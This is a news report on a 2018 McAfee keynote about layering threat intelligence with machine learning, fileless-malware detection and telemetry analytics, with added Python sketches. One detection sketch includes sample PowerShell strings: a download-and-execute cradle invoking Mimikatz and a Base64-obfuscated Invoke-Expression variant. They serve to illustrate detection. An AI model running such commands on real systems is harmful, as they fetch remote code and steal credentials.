“There is an amplification effect, where the net result is better than either one of those technologies working on their own,” he told attendees of the 2018 MPower cyber security summit in Las Vegas.
At the same event in 2017, Grobman said the key to taking advantage of machine learning (ML), artificial intelligence (AI) and data science is understanding how threat defence capabilities work together.
Picking up that theme again a year later, he demonstrated that while using threat intelligence alone in a malicious code detection simulation produces very few false positives, it fails to identify all malicious code.
“Because we are identifying malware based only on what we know to be bad, we have very few false positives. But because threat intelligence only comprehends what we have seen in the past and new threats are constantly being created, we know we are missing some,” he said.
“We essentially hit a ceiling, where the detection rate is only about 90%, which means 10% of malicious samples are being missed.”
In the same simulation using only an AI model, Grobman showed that it was possible to tune a model to achieve a 95% detection rate. “But you pay a huge price. To get the 95% detection rate, you have many more false positives. In this case, 10% of legitimate applications were being classified as malicious,” he said.
“So clearly neither one of these two scenarios is optimal in providing a good outcome, but something amazing happens if you put them together.”
To illustrate his point, Grobman showed that in the same simulation using a combination of threat intelligence and machine learning, where the samples are first classified based on what is known to be good and bad and only the unknowns are sent to the ML model, a much better result is achieved.
“With the same model configured in this way, you get close to a 100% detection rate along with a minimal false positive rate,” he said.
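The layered approach Grobman describes can be sketched in a few lines. This is a minimal illustration, not McAfee's implementation: the threat-intelligence feeds are hypothetical hash sets, and the "model" is a toy stand-in for a trained classifier. The key point is the ordering: known samples get a confident verdict from intelligence, and only unknowns reach the probabilistic model.

```python
import hashlib

# Hypothetical threat-intelligence feeds: hashes of samples already
# known to be malicious or benign (illustrative values only).
KNOWN_BAD = {hashlib.sha256(b"evil.exe").hexdigest()}
KNOWN_GOOD = {hashlib.sha256(b"notepad.exe").hexdigest()}

def ml_score(sample: bytes) -> float:
    """Toy stand-in for a trained classifier: returns a maliciousness
    probability. Here, byte diversity substitutes for real features."""
    return len(set(sample)) / 256

def classify(sample: bytes, threshold: float = 0.5) -> str:
    """Layered pipeline: consult threat intelligence first, and send
    only unknown samples to the ML model."""
    digest = hashlib.sha256(sample).hexdigest()
    if digest in KNOWN_BAD:
        return "malicious"   # confident verdict, no model needed
    if digest in KNOWN_GOOD:
        return "benign"      # confident verdict, no model needed
    # Unknown sample: fall back to the model's probabilistic verdict.
    return "malicious" if ml_score(sample) >= threshold else "benign"

print(classify(b"evil.exe"))        # known bad -> "malicious"
print(classify(b"notepad.exe"))     # known good -> "benign"
print(classify(bytes(range(200))))  # unknown -> model decides
```

Because the model never sees the samples that intelligence already resolves, its false positives apply only to the residual unknowns, which is why the combined detection rate improves without the 10% false-positive penalty of the model running alone.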
“This demonstrates that it is really not about finding the right technology, it is about figuring out how we can use technologies to provide the best outcome by working together.”
Tracing McAfee’s progress based on its investment in AI, Grobman said the journey started with machine learning on the endpoint in 2016 with Real Protect Static, which uses ML to look at what something is to determine whether it is malicious.
This was followed later that year by Real Protect Dynamic, which looked at application behaviour to determine if it was malicious.
“But what we found in 2018 is that world-class malware detection alone is not enough because so many threats no longer look anything like traditional malware,” said Grobman.
“A new class of threat that the industry is calling ‘fileless malware’ covers a wide range of different scenarios, but essentially uses scripting that can be launched from many different places [such as legitimate tools] like PowerShell.”
In response, Grobman announced the third variant of McAfee’s endpoint machine learning technology, called Real Protect Fileless.
“We’ve essentially partnered with the [Microsoft] Windows 10 architecture – something called the anti-malware scan interface – so that whenever Windows is about to run a script, Windows will call Real Protect Fileless to make an assessment of whether the script is malicious or not,” he said.
In practice, Grobman said this means that scripts will be assessed regardless of where they are run from and they will be blocked if they are malicious.
“We used ML in this case because we need to be flexible enough to detect malicious things beyond what can be detected with signatures alone,” he said.
To demonstrate the value of this, Grobman showed that while Windows 10’s Defender was able to detect a standard version of the Mimikatz PowerShell script used to steal credentials, its signature-based approach meant it could not detect an obfuscated version of the same script. Real Protect Fileless detected both versions of Mimikatz.
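The demonstration turns on a general weakness of signatures that is easy to show in miniature. The sketch below is purely illustrative, in Python rather than PowerShell, and does not represent how Defender or Real Protect Fileless actually work: an exact-match signature misses a Base64-obfuscated payload, while a simple behaviour-style heuristic (here, a hypothetical "decode-and-invoke" rule) flags it.

```python
import base64
import re

SIGNATURE = "Invoke-Mimikatz"  # toy exact-match signature

def signature_detect(script: str) -> bool:
    """Classic signature matching: flags only scripts containing the known string."""
    return SIGNATURE in script

def heuristic_detect(script: str) -> bool:
    """Toy stand-in for a behaviour/feature-based detector: also flags scripts
    that decode Base64 content and hand it to an invocation primitive."""
    decodes = re.search(r"FromBase64String", script) is not None
    invokes = re.search(r"Invoke-Expression|IEX", script) is not None
    return signature_detect(script) or (decodes and invokes)

plain = "IEX (New-Object Net.WebClient).DownloadString($u); Invoke-Mimikatz"
payload = base64.b64encode(SIGNATURE.encode()).decode()
obfuscated = (
    "$p=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("
    f"'{payload}'));Invoke-Expression $p"
)

print(signature_detect(plain))       # True  - signature string is present
print(signature_detect(obfuscated))  # False - encoding hides the string
print(heuristic_detect(obfuscated))  # True  - decode-and-invoke pattern
```

An ML model generalises the same idea: instead of one hand-written rule, it learns many such behavioural features, which is why Grobman says signatures alone are not flexible enough here.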
Grobman also used his keynote to demonstrate the power of using advanced analytics and telemetry data to produce actionable insights, which McAfee CEO Chris Young has identified as a strategic direction of product development for the company.
“McAfee has an amazing quantity of threat telemetry collected from about a billion sensors across consumer and enterprise installations around the world that see a wide range of technical indicators in networks, web gateways, endpoints and cloud-based operations,” he said.
To make use of all this telemetry, Grobman said McAfee has “built a pipeline” that is able to ingest the data, redact it where required and prepare it to be analysed.
“In five minutes alone, we get 116 million pieces of telemetry, which sets the foundation for being able to look at information that we can ultimately transform into a capability that will give organisations a different type of visibility into their environment.”
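The ingest-and-redact stage Grobman describes can be sketched as a single transformation per record. This is a hypothetical illustration, not McAfee's pipeline: the field names and redaction policy are assumptions. The idea is to pseudonymise identifying fields with a one-way hash (preserving the ability to correlate records) and mask embedded IP addresses, while leaving technical indicators intact for analysis.

```python
import hashlib
import re

SENSITIVE_FIELDS = {"user", "host"}  # assumed redaction policy
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def redact(record: dict) -> dict:
    """Prepare one telemetry record for analysis: pseudonymise identifying
    fields and mask IP addresses inside free-text values."""
    out = {}
    for key, value in record.items():
        if key in SENSITIVE_FIELDS:
            # One-way hash keeps records joinable without exposing identity.
            out[key] = hashlib.sha256(str(value).encode()).hexdigest()[:12]
        elif isinstance(value, str):
            out[key] = IP_RE.sub("x.x.x.x", value)
        else:
            out[key] = value
    return out

raw = {
    "event": "process_start",
    "host": "LAPTOP-042",
    "user": "alice@example.com",
    "detail": "beacon to 203.0.113.7 observed",
}
clean = redact(raw)
print(clean["detail"])        # IP address masked
print("alice" in str(clean))  # False: identity pseudonymised
```

At the scale Grobman cites (116 million records per five minutes, roughly 387,000 per second), a real pipeline would run such transformations in a distributed streaming system, but the per-record logic is the same shape.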
In the same way that the US National Hurricane Center is able to translate storm telemetry into a hurricane’s projected path and impact, Grobman said McAfee is working to transform cyber security telemetry to provide insights on which organisations can base a plan of action.
“We want to ensure we are able to provide new ways of thinking about the world and what is happening in organisations and how they intersect. We essentially want to take the raw data out of those billion sensors, combine it with organisation-specific data and transform it using world class analytics capability into information that is actionable,” he said.
To support McAfee’s efforts to deliver insights, Grobman said the company is running a research project to develop a real-time system that provides a global view every second of every day of the threats that are occurring around the world.
“There are so many scenarios that we will be able to look at and then identify which customers will be potentially affected and give them an early warning of what is coming so they can take defensive actions before the proverbial storm hits,” he said.
“We recognise that nation states and cyber criminals continue to up their game, and so must we because we can no longer pretend that the data from a single environment will be sufficient to defend our organisations.
“Future innovation is going to be all about identifying insights from the confluence of data from organisations and a global perspective and then building the next generation of analytics that looks at that type of data to enable a bright future.”